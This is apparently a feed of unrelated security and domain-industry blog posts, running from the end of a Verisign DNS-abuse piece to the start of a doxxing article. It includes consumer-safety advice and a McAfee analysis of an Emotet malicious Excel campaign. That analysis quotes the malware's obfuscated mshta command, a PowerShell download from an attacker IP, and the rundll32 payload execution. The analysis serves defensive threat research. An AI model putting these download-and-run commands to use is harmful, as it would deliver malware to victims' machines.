Following the launch of the 2012 round of new gTLDs, and the finalization of the 2013 amendments to the RAA, several ICANN bylaw-mandated review teams engaged further on the issue of DNS Abuse. These included the Competition, Consumer Trust and Consumer Choice Review Team (CCT-RT), and the second Security, Stability and Resiliency Review Team (SSR2-RT). Both final reports identified and reinforced the need for additional tools to help measure and combat DNS abuse. Also, during this timeframe, the GAC, along with the At-Large Advisory Committee and the Security and Stability Advisory Committee, issued their own respective communiques and formal advice to the ICANN Board reiterating or reinforcing past statements, and providing support for recommendations in the various Review Team reports. Most recently, the SSAC issued SAC 115 titled “SSAC Report on an Interoperable Approach to Addressing Abuse Handling in the DNS.” These ICANN community group inputs have been instrumental in bringing additional focus and/or clarity to the topic of DNS abuse, and have encouraged ICANN and its gTLD registries and registrars to look for improved mechanisms to address the types of abuse within our respective remits.

During 2020 and 2021, ICANN’s gTLD contracted parties have been constructively engaged with other parts of the ICANN community, and with ICANN Org, to advance improved understanding on the topic of DNS security threats, and to identify new and improved mechanisms to enhance the security, stability and resiliency of the domain name registration and resolution systems. Collectively, the registries and registrars have engaged with nearly all groups represented in the ICANN community, and we have produced important documents related to DNS abuse definitions, registry actions, registrar abuse reporting, domain generating algorithms, and trusted notifiers. These all represent significant steps forward in framing the context of the roles, responsibilities and capabilities of ICANN’s gTLD contracted parties, and, consistent with our Letter of Intent commitments, Verisign has been an important contributor, along with our partners, in these Contracted Party House initiatives.

In addition, the gTLD contracted parties and ICANN Organization continue to engage constructively on a number of fronts, including upcoming work on standardized registry reporting, which will help result in better data on abuse mitigation practices that will help to inform community work, future reviews, and provide better visibility into the DNS security landscape.

Other Groups and Actors Focused on DNS Security

It is important to note that groups outside of ICANN’s immediate multi-stakeholder community have contributed significantly to the topic of DNS abuse mitigation:

Internet & Jurisdiction Policy Network
The Internet & Jurisdiction Policy Network is a multi-stakeholder organization addressing the tension between the cross-border internet and national jurisdictions. Its secretariat facilitates a global policy process engaging over 400 key entities from governments, the world’s largest internet companies, technical operators, civil society groups, academia and international organizations from over 70 countries. The I&JP has been instrumental in developing multi-stakeholder inputs on issues such as trusted notifier, and Verisign has been a long-time contributor to that work since the I&JP’s founding in 2012.

DNS Abuse Institute
The DNS Abuse Institute was formed in 2021 to develop “outcomes-based initiatives that will create recommended practices, foster collaboration and develop industry-shared solutions to combat the five areas of DNS Abuse: malware, botnets, phishing, pharming, and related spam.” The Institute was created by Public Interest Registry, the registry operator for the .org TLD.

Global Cyber Alliance
The Global Cyber Alliance is a nonprofit organization dedicated to making the internet a safer place by reducing cyber risk. The GCA builds programs, tools and partnerships to sustain a trustworthy internet to enable social and economic progress for all.

ECO “topDNS” DNS Abuse Initiative
Eco is the largest association of the internet industry in Europe. Eco is a long-standing advocate of an “Internet with Responsibility” and of self-regulatory approaches, such as the DNS Abuse Framework. The eco “topDNS” initiative will help bring together stakeholders with an interest in combating and mitigating DNS security threats, and Verisign is a supporter of this new effort.

Other Community Groups
Verisign contributes to the anti-abuse, technical and policy communities: We continuously engage with ICANN and an array of other industry partners to help ensure the continued safe and secure operation of the DNS. For example, Verisign is actively engaged in anti-abuse, technical and policy communities such as the Anti-Phishing and Messaging, Malware and Mobile Anti-Abuse Working Groups, FIRST and the Internet Engineering Task Force.

What Verisign is Doing Today

As a leader in the domain name industry and DNS ecosystem, Verisign supports and has contributed to the cross-community efforts enumerated above. In addition, Verisign also engages directly by:

• Monitoring for abuse: Protecting against abuse starts with knowing what is happening in our systems and services, in a timely manner, and being capable of detecting anomalous or abusive behavior, and then reacting to address it appropriately. Verisign works closely with a range of actors, including trusted notifiers, to help ensure our abuse mitigation actions are informed by sources with necessary subject matter expertise and procedural rigor.
• Blocking and redirecting abusive domain names: Blocking certain domain names that have been identified by Verisign and/or trusted third parties as security threats, including botnets that leverage well-understood and characterized domain generation algorithms, helps us to protect our infrastructure and neutralize or otherwise minimize potential security and stability threats more broadly by remediating abuse enabled via domain names in our TLDs. For example, earlier this year, Verisign observed a botnet family that was responsible for such a disproportionate amount of total global DNS queries, we were compelled to act to remediate the botnet. This was referenced in Verisign’s Q1 2021 Domain Name Industry Brief Volume 18, Issue 2.
• Avoiding disposable domain name registrations: While heavily discounted domain name pricing strategies may promote short-term sales, they may also attract a spectrum of registrants who might be engaged in abuse. Some security threats, including phishing and botnets, exploit the ability to register large numbers of ‘disposable’ domain names rapidly and cheaply. Accordingly, Verisign avoids marketing programs that would permit our TLDs to be characterized in this class of ‘disposable’ domains, that have been shown to attract miscreants and enable abusive behavior.
• Maintaining a cooperative and responsive partnership with law enforcement and government agencies, and engagement with courts of relevant jurisdiction: To ensure the security, stability and resiliency of the DNS and the internet at large, we have developed and maintained constructive relationships with United States and international law enforcement and government agencies to assist in addressing imminent and ongoing substantial security threats to operational applications and critical internet infrastructure, as well as illegal activity associated with domain names.
• Ensuring adherence of contractual obligations: Our contractual frameworks, including our registry policies and .com Registry-Registrar Agreements, help provide an effective legal framework that discourages abusive domain name registrations. We believe that fair and consistent enforcement of our policies helps to promote good hygiene within the registrar channel.
• Entering into a binding Letter of Intent with ICANN that commits both parties to cooperate in taking a leadership role in combating security threats. This includes working with the ICANN community to determine the appropriate process for, and development and implementation of, best practices related to combating security threats; to educate the wider ICANN community about security threats; and support activities that preserve and enhance the security, stability and resiliency of the DNS. Verisign also made a substantial financial commitment in direct support of these important efforts.

Trusted Notifiers

An important concept and approach for mitigating illegal and abusive activity online is the ability to engage with and rely upon third-party “trusted notifiers” to identify and report such incidents at the appropriate level in the DNS ecosystem. Verisign has supported and been engaged in the good work of the Internet & Jurisdiction Policy Network since its inception, and we’re encouraged by its recent progress on trusted notifier framing. As mentioned earlier, there are some key questions to be addressed as we consider the viability of engaging trusted notifiers or building trusting notifier entities, to help mitigate illegal and abusive online activity.

Verisign’s recent experience with the U.S. government (NTIA and FDA) in combating illegal online opioid sales has been very helpful in illuminating a possible approach for third-party trusted notifier engagement. As noted, we have also benefited from direct engagement with the Internet Watch Foundation and law enforcement in combating CSAM. These recent examples of third-party engagement have underscored the value of a well-formed and executed notification regime, supported by clear expectations, due diligence and due process.

Discussions around trusted notifiers and an appropriate framework for engagement are under way, and Verisign recently engaged with other registries and registrars to lead the development of such a framework for further discussion within the ICANN community. We have significant expertise and experience as an infrastructure provider within our areas of technical, legal and contractual responsibility, and we are aggressive in protecting our operations from bad actors. But in matters related to illegal or abusive content, we need and value contributions from third parties to appropriately identify such behavior when supported by necessary evidence and due diligence. Precisely how such third-party notifications can be formalized and supported at scale is an open question, but one that requires further exploration and work. Verisign is committed to continuing to contribute to these ongoing discussions as we work to mitigate illegal and abusive threats to the security, stability and resiliency of the internet.

Conclusion

Over the last several years, DNS abuse and DNS-related security threat mitigation has been a very important topic of discussion in and around the ICANN community. In cooperation with ICANN, contracted parties, and other groups within the ICANN community, the DNS ecosystem including Verisign has been constructively engaged in developing a common understanding and practical work to advance these efforts, with a goal of meaningfully reducing the level and impact of malicious activity in the DNS. In addition to its contractual compliance functions, ICANN’s contributions have been important in helping to advance this important work and it continues to have a critical coordination and facilitation function that brings the ICANN community together on this important topic. The ICANN community’s recent focus on DNS abuse has been helpful, significant progress has been made, and more work is needed to ensure continued progress in mitigating DNS security threats. As we look ahead to 2022, we are committed to collaborating constructively with ICANN and the ICANN community to deliver on these important goals.

The post Ongoing Community Work to Mitigate Domain Name System Security Threats appeared first on Verisign Blog.

Does Your Child Have an Unhealthy Relationship with Social Media?

Have you noticed that when parents gather, it doesn’t take long before the topic of kids and social media comes up. That’s because concern over screen time is a big deal, especially in this post-pandemic season. Parents want to know: How much is too much screen time? When should we step in? How do we reverse poor habits, and what will the lasting digital fallout of the lockdown be?  

Device Dependence 

These conversations weigh heavy on parents for a good reason. According to a report from Common Sense Media, teens spend an average of seven hours and 22 minutes on their phones a day. Tweens (ages 8 to 12) spend four hours and 44 minutes daily. This is time outside of schoolwork.  

Since the pandemic, another study claims that screen time for teens doubled to 7.7 hours a day—plus 5 to 7 daily hours of online learning, according to a study published in JAMA Pediatrics. In addition, according to the Journal of Affective Disorders Reports, children overall have been spending nearly triple the recommended amount of time on their screens. 

The good news is that social media also became a powerful tool for kids during the pandemic. Social channels helped kids connect with peers and combat loneliness and other mental health challenges. Still, the poor habit of device dependence may have come with those benefits.  

Revising Screen time 

While the debate continues over social media’s impact on kids and the research methodology continues to evolve, we can hold on to one clear truth: Any activity in excess can cause kids harm. When it comes to social media, too much screen time may contribute to sleep deprivation, a lack of healthy, and poor academics. In addition, studies show that mental health can be impacted by exposure to hate speech, sexual content, cyberbullying, and comparing oneself to others both physically and financially.  

As parents, we know when our family’s wellbeing is in jeopardy. We see it even if we fail to acknowledge it right away. Our kids might become compelled to check their phones. In fact, they panic when they can’t check their likes and comments every few minutes. We notice the red eyes and moodiness at the breakfast table caused by a late-night Tic Tock marathon. We sense a surge of anxiety in our kids when technology goes from entertaining to distressing.  

Thankfully, it’s never too late to help your kids better understand the impact of their actions and revise digital habits.  

Establishing new habits

1. Start small and make it fun. 

In the bestselling book Atomic Habits,  author James Clear says, “The task of breaking a bad habit is like uprooting a powerful oak within us.” He adds, “The task of building a good habit is like cultivating a delicate flower one day at a time.” Lasting change, says clear, needs to be enjoyable, not a punishment. If the goal is shaving a few hours off your child’s screen time, consider connecting time limits to an enjoyable activity such as making a meal together or creating an art space in your home for creative projects.  

2. Consider a device curfew. 

The data is in: The bright screens (and blue light emitted from devices( can cause permanent sleep cycle and brain/melatonin issues, which can have a cascading effect on physical and mental health. Turning off (or limiting the use of) electronic devices at least 15-30 minutes before going to bed may help prevent any adverse effects of technology and screen use on sleep. Consider investing in filtering software that comes with the time limits the whole family can all agree on. Do your research to ensure your family’s technology functions to empower, educate, and entertain. 

3. Encourage mindful media use. 

Consider how your child uses their time before suggesting sweeping changes to your child’s screen time. Are they vegetating, or are they consciously engaged? Are they creating and learning? Are they engaging with others or stalking accounts and slipping into “comparison despair?” Are family and school responsibilities suffering? Is there a compulsion to post or thoughtfulness? All kids are different, and all online experiences vary. Encourage your child to take time to consider how they feel and what they think while they are using their technology. 

4. Educate your kids—use facts. 

One way to negotiate screen limits is to make sure your kids understand the impact of excess media. Balance includes tapping into the benefits of social media while also taking steps to protect the body’s need for physical activity, real-life relationships, goal-setting, creative activities, mindfulness, and self-reflection.   

Helping kids manage and constantly revise their social media habits is a 24/7 endeavor from the minute they wake up to the minute they fall asleep. The biggest piece of that “management” plan and is keeping frequent, open, and honest communication a critical part of designing habits that encourage a healthy relationship with both peers and technology.  

The post Does Your Child Have an Unhealthy Relationship with Social Media? appeared first on McAfee Blog.

Verisign Q3 2021 The Domain Name Industry Brief: 364.6 Million Domain Name Registrations in the Third Quarter of 2021

Today, we released the latest issue of The Domain Name Industry Brief, which shows that the third quarter of 2021 closed with 364.6 million domain name registrations across all top-level domains, a decrease of 2.7 million domain name registrations, or 0.7%, compared to the second quarter of 2021.^1,2 Domain name registrations have decreased by 6.1 million, or 1.6%, year over year.^1,2

Check out the latest issue of The Domain Name Industry Brief to see domain name stats from the third quarter of 2021, including:

• Top 10 Largest TLDs by Number of Reported Domain Names
• Top 10 Largest ccTLDs by Number of Reported Domain Names
• ngTLDs as Percentage of Total TLDs
• Geographical ngTLDs as Percentage of Total Corresponding Geographical TLD

The Domain Name Industry Brief this quarter also includes an overview of the ongoing community work to mitigate DNS security threats.

To see past issues of The Domain Name Industry Brief, please visit verisign.com/dnibarchives.

---

1. The figure(s) includes domain names in the .tk ccTLD. .tk is a ccTLD that provides free domain names to individuals and businesses. Revenue is generated by monetizing expired domain names. Domain names no longer in use by the registrant or expired are taken back by the registry and the residual traffic is sold to advertising networks. As such, there are no deleted .tk domain names. The .tk zone reflected here is based on data from Q4 2020, which is the most recent data available. https://www.businesswire.com/news/home/20131216006048/en/Freenom-Closes-3M-Series-Funding#.UxeUGNJDv9s.
2. The generic TLD, ngTLD and ccTLD data cited in the brief: (i) includes ccTLD Internationalized Domain Names (IDNs), (ii) is an estimate as of the time this brief was developed and (iii) is subject to change as more complete data is received. Some numbers in the brief may reflect standard rounding.

The post Verisign Q3 2021 The Domain Name Industry Brief: 364.6 Million Domain Name Registrations in the Third Quarter of 2021 appeared first on Verisign Blog.

Plundered bitcoins recovered by FBI – all 3,879-and-one-sixth of them!

Phew! An audacious crime... that didn't work out.

IRP Panel Sanctions Afilias, Clears the Way for ICANN to Decide .web Disputes

The .web Independent Review Process (IRP) Panel issued a Final Decision six months ago, in May 2021. Immediately thereafter, the claimant, Afilias Domains No. 3 Limited (now a shell entity known as AltaNovo Domains Limited), filed an application seeking reconsideration of the Final Decision under Rule 33 of the arbitration rules. Rule 33 allows for the clarification of an ambiguous ruling and allows the Panel the opportunity to supplement its decision if it inadvertently failed to consider a claim or defense, but specifically does not permit wholesale reconsideration of a final decision. The problem for Afilias’ application, as we said at the time, was that it sought exactly that.

The Panel ruled on Afilias’ application on Dec. 21, 2021. In this latest ruling, the Panel not only rejected Afilias’ application in its entirety, but went further and sanctioned Afilias for having filed it in the first place. Quoting from the ruling:

In the opinion of the Panel, under the guise of seeking an additional decision, the Application is seeking reconsideration of core elements of the Final Decision. Likewise, under the guise of seeking interpretation, the Application is requesting additional declarations and advisory opinions on a number of questions, some of which had not been discussed in the proceedings leading to the Final Decision.

In such circumstances, the Panel cannot escape the conclusion that the Application is “frivolous” in the sense of it “having no sound basis (as in fact or law).” This finding suffices to entitle [ICANN] to the cost shifting decision it is seeking…the Panel hereby unanimously…Grants [ICANN’s] request that the Panel shift liability for the legal fees incurred by [ICANN] in connection with the Application, fixes at US $236,884.39 the amount of the legal fees to be reimbursed to [ICANN] by [Afilias]…and orders [Afilias] to pay this amount to [ICANN] within thirty (30) days….

In light of the Panel’s finding that Afililas’ Rule 33 application was so improper and frivolous as to be sanctionable, a serious question arises about the motives in filing it. Reading the history of the .web proceedings, one possible motivation is becoming more clear. The community will recall that, five years ago, Donuts (through its wholly-owned subsidiary Ruby Glen) failed in its bid to enjoin the .web auction when a federal court rejected false allegations that Nu Dot Co (NDC) had failed to disclose an ownership change. After the auction was conducted, Afilias then picked up the litigation baton from Donuts. Afilias’ IRP complaint demanded that the arbitration Panel nullify the auction results, and award .web to itself, thereby bypassing ICANN completely. In the May 2021 Final Decision the IRP Panel gave an unsurprising but firm “no” to Afilias’ request to supplant ICANN’s role, and instead directed ICANN’s Board to review the complaints about the conduct of the .web contention set members and then make a determination on delegation.

A result of this five-year battle has been to prevent ICANN from passing judgment on the .web situation. These proceedings have unsuccessfully sought to have courts and arbitrators stand in the shoes of ICANN, rather than letting ICANN discharge its mandated duty to determine what, if anything, should be done in response to the allegations regarding the pre-auction conduct of the contention set. This conduct includes Afilias’ own wrongdoing in violating the pre-auction communications blackout imposed in the Auction Rules. That misconduct is set forth in a July 23, 2021 letter by NDC to ICANN, since published by ICANN, containing written proof of Afilias’ violation of the auction rules. In its Dec. 21 ruling, the Panel made it unmistakably clear that it is ICANN – not a judge or a panel of arbitrators – who must first review all allegations of misconduct by the contention set, including the powerful evidence indicating that it is Afilias’ .web application, not NDC’s, that should be disqualified.

If Afilias’ motivation has been to avoid ICANN’s scrutiny of its own pre-auction misconduct, especially after exiting the registry business when it appears that its only significant asset is the .web application itself, then what we should expect to see next is for Afilias/AltaNovo to manufacture another delaying attack on the Final Decision. Perhaps this is why its litigation counsel has already written ICANN threatening to continue litigation “in all available fora whether within or outside of the United States of America.…”

It is long past time to put an end to this five-year campaign, which has interfered with ICANN’s duty to decide on the delegation of .web, harming the interests of the broader internet community. The new ruling obliges ICANN to take a decisive step in that direction.

The post IRP Panel Sanctions Afilias, Clears the Way for ICANN to Decide .web Disputes appeared first on Verisign Blog.

Apple Home software bug could lock you out of your iPhone

The finder of this bug insists it "poses a serious risk". We're not so sure, but we recommend you take steps to avoid it anyway.

What to Do If You’re Caught Up in a Data Breach

It happens with more regularity than any of us like to see. There’s either a headline in your news feed or an email from a website or service you have an account with—there’s been a data breach. So what do you do when you find out that you and your information may have been caught up in a data breach? While it can feel like things are out of your hands, there are actually several things you can do to protect yourself. 

Let’s start with a look at what kind of information may be at stake and why crooks value that information so much (it’s more reasons than you may think). 

What can get exposed in a data breach?  

The fact is that plenty of our information is out there on the internet, simply because we go about so much of our day online, whether that involves shopping, banking, getting results from our doctors, or simply hopping online to play a game once in a while.  

Naturally, that means the data in any given breach will vary from service to service and platform to platform involved. Certainly, a gaming service will certainly have different information about you than your insurance company. Yet broadly speaking, there’s a broad range of information about you stored in various places, which could include:  

• Username and password 
• E-mail address 
• Phone numbers and home address 
• Contact information of friends and family 
• Date of birth 
• Driver’s license number 
• Credit card and debit card numbers, bank account details 
• Purchase history and account behavior history 
• Patient information (in the case of healthcare breaches) 
• Social Security Number or Tax ID Number 

As to what gets exposed and when you might find out about it, that can vary greatly as well. One industry research report found that 60% of breaches were discovered in just days from the initial attack while others could take months or even longer to detect. Needless to say, the timeline can get rather stretched before word reaches you, which is a good reason to change your passwords regularly should any of them get swept up in a breach. (An outdated password does a hacker no good—more on that in a bit.) 

What do crooks do with this kind of information? 

The answer is plenty. In all, personal information like that listed above has a dollar value to it. In a way, your data and information are a kind of currency because they’re tied to everything from your bank accounts, investments, insurance payments—even tax returns and personal identification like driver’s licenses.  

With this information in hand, a crook can commit several types of identity crime—ranging from fraud to theft. In the case of fraud, that could include running up a bill on one of your credits cards or draining one of your bank accounts. In the case of theft, that could see crooks impersonate you so they can open new accounts or services in your name. Beyond that, they may attempt to claim your tax refund or potentially get ID issued in your name as well. 

Another possibility is that a hacker will simply sell that information on the dark marketplace, perhaps in large clumps or as individual pieces of information that go for a few dollars each. However it gets sold, these dark-market practices allow other fraudsters and thieves to take advantage of your identity for financial or other gains.  

Most breaches are financially motivated, with some researchers saying nearly 90% of breaches are about the money. However, we’ve also seen hackers simply dump stolen information out there for practically anyone to see. The motivations behind them vary, yet could involve anything from damaging the reputation of an organization to cases of revenge.   

Noteworthy examples of data breaches 

A list of big data breaches is a blog article of its own, yet here’s a quick list of some of the largest and most impactful breaches we’ve seen in recent years: 

• Facebook – 2019: Two datasets leaked the records of more than 530 million users, including phone numbers, account names, Facebook IDs, and more. 
• Marriott International (Starwood) – 2018. Leakage of 500,000 guest names, emails, actual mailing addresses, phone numbers, passport numbers, Starwood Preferred Guest account information, date of birth, and information about stays. 
• Equifax – 2017. Approximately 147 million records, including name, address, date of birth, driver’s license numbers, and Social Security Numbers were leaked, as well as credit card information for a further 200,000 victims. 

Needless to say, it’s not just the big companies that get hit. Healthcare facilities have seen their data breached, along with the operations of popular restaurants. Small businesses find themselves in the crosshairs as well, with one report stating that 43% of data leaks target small businesses. Those may come by way of an attack on where those businesses store their records, a disgruntled employee, or by way of a compromised point-of-sale terminal in their store, office, or location. 

In short, when it comes to data breaches, practically any business is a potential target because practically every business is online in some form or fashion. Even if it’s by way of a simple point-of-sale machine. 

What to do if you think your information may have been exposed by a breach 

When a business, service, or organization falls victim to a breach, it doesn’t always mean that you’re automatically a victim too. Your information may not have been caught up in it. However, it’s best to act as if it was. With that, we strongly suggest you take these immediate steps. 

1. Change your passwords and use two-factor authentication 

Given the possibility that your password may be in the hands of a hacker, change it right away. Strong, unique passwords offer one of your best defenses against hackers. Update them regularly as well. As mentioned above, this can protect you in the event a breach occurs and you don’t find out about it until well after it’s happened. You can spare yourself the upkeep that involves a password manager that can keep on top of it all for you. If your account offers two-factor authentication as part of the login process, make use of it as it adds another layer of security that makes hacking tougher.  

2. Keep an eye on your accounts 

If you spot unusual or unfamiliar charges or transactions in your account, bank, or debit card statements, follow up immediately. That could indicate improper use. In general, banks, credit card companies, and many businesses have countermeasures to deal with fraud, along with customer support teams that can help you file a claim if needed. 

3. Sign up for an identity protection service 

If you haven’t done so already, consider signing up for a service that can monitor dozens of types of personal information and then alert you if any of them are possibly being misused. Identity protection such as ours gives you the added benefit of a professional recovery specialist who can assist with restoring your affairs in the wake of fraud or theft, plus up to $1 million in insurance coverage.  

What if I think I’m the victim of identity theft? 

Our advice is to take a deep breath and get to work. By acting quickly, you can potentially minimize and even prevent any damage that’s done. With that, we have two articles that can help guide the way if you think you’re the victim of identity theft, each featuring a series of straightforward steps you can take to set matters right: 

• Top Signs of Identity Theft 
• How to Report Identity Theft to Social Security 

Again, if you have any concerns. Take action. The first steps take only minutes. Even if the result is that you find out all’s well, you’ll have that assurance and you’ll have it rather quickly. 

The post What to Do If You’re Caught Up in a Data Breach appeared first on McAfee Blog.

S3 Ep66: Cybercrime busts, wormable Windows, and the crisis of featuritis [Podcast + Transcript]

Latest epsiode - listen now!

Emotet’s Uncommon Approach of Masking IP Addresses

Authored By: Kiran Raj

In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and octal formats to represent IP address which is usually represented by decimal formats. An example of this is shown below:

Hexadecimal format: 0xb907d607

Octal format: 0056.0151.0121.0114

Decimal format: 185.7.214.7

This change in format might evade some AV products relying on command line parameters but McAfee was still able to protect our customers. This blog explains this new technique.

Threat Summary

1. The initial attack vector is a phishing email with a Microsoft Excel attachment. 
2. Upon opening the Excel document and enabling editing, Excel executes a malicious JavaScript from a server via mshta.exe 
3. The malicious JavaScript further invokes PowerShell to download the Emotet payload. 
4. The downloaded Emotet payload will be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.

Maldoc Analysis

Below is the image (figure 2) of the initial worksheet opened in excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.

On examining the excel spreadsheet further, we can see a few cell addresses added in the Named Manager window. Cells mentioned in the Auto_Open value will be executed automatically resulting in malicious code execution.

Below are the commands used in Hexadecimal and Octal variants of the Maldocs

FORMAT	OBFUSCATED CMD	DEOBFUSCATED CMD
Hexadecimal	cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html	http://185[.]7[.]214[.]7/fer/fer.html
Octal	cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html	http://46[.]105[.]81[.]76/c.html

Execution

On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript which is within an html file.

The downloaded file fer.html containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code

The Malicious JavaScript invokes PowerShell to download the Emotet payload from “hxxp://185[.]7[.]214[.]7/fer/fer.png” to the following path “C:\Users\Public\Documents\ssd.dll”.

cmd line

(New-Object Net.WebClient).DownloadString(‘http://185[.]7[.]214[.]7/fer/fer.png’)

The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server

cmd line

cmd  /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString

IOC

TYPE	VALUE	SCANNER	DETECTION NAME
XLS	06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c	McAfee LiveSafe and Total Protection	X97M/Downloader.nn
DLL	a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3	McAfee LiveSafe and Total Protection	Emotet-FSY
HTML URL	http://185[.]7[.]214[.]7/fer/fer.html http://46[.]105[.]81[.]76/c.html	WebAdvisor	Blocked
DLL URL	http://185[.]7[.]214[.]7/fer/fer.png http://46[.]105[.]81[.]76/cc.png	WebAdvisor	Blocked

MITRE ATT&CK

TECHNIQUE ID	TACTIC	TECHNIQUE DETAILS	DESCRIPTION
T1566	Initial access	Phishing attachment	Initial maldoc uses phishing strings to convince users to open the maldoc
T1204	Execution	User Execution	Manual execution by user
T1071	Command and Control	Standard Application Layer Protocol	Attempts to connect through HTTP
T1059	Command and Scripting Interpreter	Starts CMD.EXE for commands execution	Excel uses cmd and PowerShell to execute command
T1218	Signed Binary Proxy Execution	Uses RUNDLL32.EXE and MSHTA.EXE to load library	rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript

Conclusion

Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.

The post Emotet’s Uncommon Approach of Masking IP Addresses appeared first on McAfee Blog.

Microsoft blocks web installation of its own App Installer files

It's a big deal when a vendor decides to block one of its own "features" for security reasons. Here's why we think it's a good idea.

Self-styled “Crocodile of Wall Street” arrested with husband over Bitcoin megaheist

The cops say they've recovered 80% of a $72 million cryptocoin heist... but the recovered funds alone are now worth over $4 billion!

Adobe fixes zero-day exploit in e-commerce code: update now!

There's a remote code execution hole in Adobe e-commerce products - and cybercrooks are already exploiting it.

Phony Valentines: Online Dating Scams and How to Spot Them

For years now, the popularity of online dating has been on the rise—and so have the number of online romance scams that leave people with broken hearts and empty wallets. 

According to the U.S. Federal Trade Commission (FTC), the reported costs of online romance scams jumped 50% from 2019 to 2020, to the tune of $304 million. And that’s not entirely because 2020 was a pandemic year. From 2016 to 2020, the volume of reported cases tripled, while reported losses nearly quadrupled. Over that period, online romance scams are not only becoming more common, but they’re also becoming more costly.

 

How do online dating and romance scams get started? 

Dating and romance scams aren’t limited to online dating apps and sites, they’ll happen on social media and in online games as well. However, the FTC reports that the scam usually starts the same way, typically through an unexpected friend request or a message that comes out of the blue.  

With that initial introduction made, a chat begins, and a friendship (or more) blossoms from there. Along the way, the scammer will often rely on a mix of somewhat exotic yet believable storytelling to lure the victim in, often involving their job and where they’re working. Reports say that scammers will talk of being workers on an offshore oil rig, members of the military stationed overseas, doctors working with an international organization, or working in the sort of jobs that would prevent them from otherwise easily meeting up in person. 

With the phony relationship established, the scammer starts asking for money. The FTC reports that they’ll ask for money for several bogus reasons, usually revolving around some sort of hardship where they need a “little help” so that they can pay: 

• For a plane ticket or other travel expenses. 
• For medical expenses. 
• Customs fees to retrieve something. 
• Gambling debts. 
• A visa or other official travel documents. 

The list goes on, yet that’s the general gist. Scammers often employ a story with an intriguing complication that seems just reasonable enough, one where the romance scammer makes it sound like they could really use the victim’s financial help. 

Common types of online dating scams 

People who have filed fraud reports say they’ve paid their scammer in a few typical ways.  

One is by wiring money, often through a wire transfer company. The benefit of this route, for the scammer anyway, is that this is as good as forking over cash. Once it’s gone, it’s gone. The victim lacks the protections they have with other payment forms, such as a credit card that allows the holder to cancel or contest a charge. 

Another way is through gift cards. Scammers of all stripes, not just romance scammers, like these because they effectively work like cash, whether it’s a gift card for a major online retailer or a chain of brick-and-mortar stores. Like a wire transfer, once that gift card is handed over, the money on it is highly difficult to recover, if at all. 

One more common payment is through reloadable debit cards. A scammer may make an initial request for such a card and then make several follow-on requests to load it up again.  

In all, a romance scammer will typically look for the easiest payment method that’s the most difficult to contest or reimburse, leaving the victim in a financial lurch once the scam ends. 

How Do You Avoid Getting Tangled Up in an Online Dating or Romance Scam? 

When it comes to meeting new people online, the FTC suggests the following: 

• Never send money or gifts to someone you haven’t met in person—even if they send you money first. 
• Talk to someone you trust about this new love interest. It can be easy to miss things that don’t add up. So pay attention if your friends or family are concerned. 
• Take the relationship slowly. Ask questions and look for inconsistent answers. 
• Try a reverse-image search of any profile pictures the person uses. If they’re associated with another name or with details that don’t match up, it’s a scam. 

Scammers, although arguably heartless, are still human. They make mistakes. The stories they concoct are just that. Stories. They may jumble their details, get their times and dates all wrong, or simply get caught in an apparent lie. Also, keep in mind that some scammers may be working with several victims at once, which is yet another opportunity for them to get confused and slip up. 

Protecting Yourself Further From Scams on Your Social Media Accounts 

As mentioned above, some romance scammers troll social media and reach out through a direct message or friend request. With that, there are three things you can do to cut down your chances of getting caught up with a scammer: 

1. Go private

Social media platforms like Facebook, Instagram, and others give you the option of making your profile and posts visible to friends only. Choosing this setting keeps the broader internet from seeing what you’re doing, saying, and posting, which can help protect your privacy and give a romance scammer less information to exploit. 

2. Say “no” to strangers bearing friend requests

Be critical of the invitations you receive. Out-and-out strangers could be more than a romance scammer, they could be a fake account designed to gather information on users for purposes of cybercrime, or they can be an account designed to spread false information. There are plenty of them too. In fact, in Q3 of 2021 alone, Facebook took action on 1.8 billion fake accounts. Reject such requests. 

3. Protect yourself and your devices

Security software can protect you from clicking on malicious links that a scammer may send you online, while also steering you clear of other threats like viruses, ransomware, and phishing attacks in general. It can look out for your personal information as well, by protecting your privacy and monitoring your email, SSN, bank accounts, credit cards, and other info that a scammer or identity thief may put to use. With identity theft a rather commonplace occurrence today, security software is really a must. 

Put an End to it 

If you suspect that you’re being scammed, put an end to the relationship and report it, as difficult as that may feel. 

Notify the FTC at ReportFraud.ftc.gov for support and next steps to help you recover financially as much as possible. Likewise, notify the social media site, app, or service where the scam occurred as well. In some cases, you may want to file a police report, which we cover in our broader article on identity theft and fraud.  

If you sent funds via a gift card, the FTC suggests filing a claim with the company as soon as possible. They offer further advice on filing a claim here, along with a list of contact numbers for gift card brands that scammers commonly use.  

Lastly, go easy on yourself. If you find yourself a victim of online dating or romance fraud, know that you won’t be the first or last person to be taken advantage of this way. By reporting your case, you in fact may help others from falling victim too. 

The post Phony Valentines: Online Dating Scams and How to Spot Them appeared first on McAfee Blog.

S3 Ep70: Bitcoin, billing blunders, and 0-day after 0-day after 0-day [Podcast + Transcript]

Latest episode - listen and learn!

Doxxing, The Internet, and How You Can Lock Down Your Data

Have you ever been online and replied to a comment or post? Maybe it was on Reddit or on an influencer’s Instagram. Did other people reply to you, and were any of them unexpectedly hostile? When you’re online, a little hostility is sadly par for the course, but most people brush it off and move on to enjoy other aspects of life online. But what would you do if that unpleasant interaction went much farther than was reasonable? What if one day you discovered the most important parts of your identity had been maliciously and intentionally revealed online? Let’s talk about doxxing – what it is and how you can avoid becoming a victim of this kind of harassment. 

What is Doxxing?

